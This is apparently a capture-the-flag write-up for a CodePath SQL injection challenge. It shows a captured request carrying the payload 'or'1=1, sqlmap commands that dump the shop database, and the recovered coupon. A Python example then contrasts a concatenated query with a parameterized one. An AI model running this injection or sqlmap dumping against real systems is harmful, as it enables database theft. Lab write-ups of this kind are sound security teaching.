---
title: SQLi5
---

SQL Challenge 5

- https://security.codepath.com/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62/couponCheck.js
- And use http://www.jsnice.org/

```
POST /challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck HTTP/1.1
Host: security.codepath.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 18
Origin: https://security.codepath.com
DNT: 1
Connection: close
Referer: https://security.codepath.com/challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62.jsp
Cookie: JSESSIONID=1A7109000002BFD84A5790CC07BCF4B9; token=81750085213634344965054547426944321234; JSESSIONID3="Lan0jXkvMvkfLpRz6s+amA=="

couponCode='or'1=1
```

- Copy the whole request and save it to a file on your laptop (named `testing` in the commands below).
- So now we know SQL injection is more or less working here, and all we need is a powerful tool such as sqlmap.
- On Kali sqlmap is pre-installed, so just run it:
- `sqlmap -r testing`
- `sqlmap -r testing --dbs`
- `sqlmap -r testing --dump tables -D SQLiC5Shop`
- Decode: `spcil/|Pse3cr3etCouponStu.f4rU176`
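Why the `couponCode='or'1=1` value in the request above signals injection, and what a parameterized query changes, shown as an added example (not the challenge's server code). The table, columns, sample coupons and function names are assumptions, and SQLite stands in for the challenge database.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE coupons (couponCode TEXT, perCentOff INTEGER)")
    db.executemany("INSERT INTO coupons VALUES (?, ?)",
                   [("SAMPLE-10-OFF", 10), ("SAMPLE-VIP-ONLY", 100)])
    return db

def check_coupon_vulnerable(db, coupon_code):
    # Assumed shape of the flawed check: input is concatenated into the SQL text,
    # so a quote in the input ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT couponCode, perCentOff FROM coupons "
           "WHERE couponCode = '" + coupon_code + "'")
    return db.execute(sql).fetchall()

def check_coupon_parameterized(db, coupon_code):
    # The value is bound as data; quotes in it cannot change the query structure.
    sql = "SELECT couponCode, perCentOff FROM coupons WHERE couponCode = ?"
    return db.execute(sql, (coupon_code,)).fetchall()

def looks_tampered(coupon_code, max_len=64):
    # Defence in depth: assumed coupon format of letters, digits and dashes only.
    if len(coupon_code) > max_len:
        return True
    return re.fullmatch(r"[A-Za-z0-9-]+", coupon_code) is None

if __name__ == "__main__":
    db = make_db()
    probe = "'or'1=1"  # the couponCode value from the captured request
    # WHERE couponCode = '' or '1=1'  -> true for every row, so all coupons match
    print("vulnerable:   ", check_coupon_vulnerable(db, probe))
    # The same string is compared literally and matches nothing
    print("parameterized:", check_coupon_parameterized(db, probe))
    print("rejected by allow-list:", looks_tampered(probe))
```
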